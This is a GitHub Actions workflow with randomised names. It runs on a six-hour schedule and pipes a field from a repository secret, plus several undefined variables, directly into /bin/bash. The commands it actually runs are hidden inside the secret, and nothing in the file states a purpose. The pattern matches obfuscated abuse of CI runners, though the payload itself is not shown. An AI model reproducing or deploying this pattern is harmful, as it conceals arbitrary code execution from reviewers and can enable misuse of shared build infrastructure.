name: jiangzehong1293
on:
  workflow_dispatch:
  schedule:
    - cron: '4 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangzehong1293
        env:
          gnbk353: ${{ secrets.gnbk353 }}
        run: |
          echo $gnbk353 | jq -r .svvz84986 | /bin/bash
          echo $uqkgi170 | jq -r .qurh4 | /bin/bash
          echo $jfyur800 | jq -r .vbryp2 | /bin/bash
          echo $xvdqb0 | jq -r .o3432 | /bin/bash
          echo $hwwjm2 | jq -r .sgb2631 | /bin/bash
          echo $k809 | jq -r .cydm0 | /bin/bash
          echo $lesvy709 | jq -r .n88 | /bin/bash
          echo $swzjd0721 | jq -r .eto75 | /bin/bash

